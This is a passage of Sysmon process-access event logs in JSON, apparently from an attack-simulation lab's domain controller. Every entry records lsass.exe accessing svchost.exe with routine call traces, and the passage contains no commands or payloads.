{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1153,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:08.802\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 900\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-1064-5F25-0000-001067A00200}\r\nTargetProcessId: 1976\r\nTargetImage: C:\\Windows\\System32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:08.802","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"900","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-1064-5F25-0000-001067A00200}","TargetProcessId":"1976","TargetImage":"C:\\Windows\\System32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1154,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:08.802\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 900\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-1064-5F25-0000-001067A00200}\r\nTargetProcessId: 1976\r\nTargetImage: C:\\Windows\\System32\\svchost.exe\r\nGrantedAccess: 0x1478\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:08.802","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"900","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-1064-5F25-0000-001067A00200}","TargetProcessId":"1976","TargetImage":"C:\\Windows\\System32\\svchost.exe","GrantedAccess":"0x1478","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1155,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:08.818\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 900\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-1064-5F25-0000-001067A00200}\r\nTargetProcessId: 1976\r\nTargetImage: C:\\Windows\\System32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:08.818","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"900","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-1064-5F25-0000-001067A00200}","TargetProcessId":"1976","TargetImage":"C:\\Windows\\System32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1156,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:08.818\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 900\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-1064-5F25-0000-001067A00200}\r\nTargetProcessId: 1976\r\nTargetImage: C:\\Windows\\System32\\svchost.exe\r\nGrantedAccess: 0x1478\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:08.818","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"900","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-1064-5F25-0000-001067A00200}","TargetProcessId":"1976","TargetImage":"C:\\Windows\\System32\\svchost.exe","GrantedAccess":"0x1478","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1157,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:08.818\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 900\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-1064-5F25-0000-001067A00200}\r\nTargetProcessId: 1976\r\nTargetImage: C:\\Windows\\System32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:08.818","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"900","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-1064-5F25-0000-001067A00200}","TargetProcessId":"1976","TargetImage":"C:\\Windows\\System32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1158,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:08.818\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 900\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-1064-5F25-0000-001067A00200}\r\nTargetProcessId: 1976\r\nTargetImage: C:\\Windows\\System32\\svchost.exe\r\nGrantedAccess: 0x1478\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:08.818","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"900","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-1064-5F25-0000-001067A00200}","TargetProcessId":"1976","TargetImage":"C:\\Windows\\System32\\svchost.exe","GrantedAccess":"0x1478","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1159,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:08.818\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 900\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-1064-5F25-0000-001067A00200}\r\nTargetProcessId: 1976\r\nTargetImage: C:\\Windows\\System32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:08.818","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"900","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-1064-5F25-0000-001067A00200}","TargetProcessId":"1976","TargetImage":"C:\\Windows\\System32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1160,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:08.818\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 900\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-1064-5F25-0000-001067A00200}\r\nTargetProcessId: 1976\r\nTargetImage: C:\\Windows\\System32\\svchost.exe\r\nGrantedAccess: 0x1478\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:08.818","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"900","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-1064-5F25-0000-001067A00200}","TargetProcessId":"1976","TargetImage":"C:\\Windows\\System32\\svchost.exe","GrantedAccess":"0x1478","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed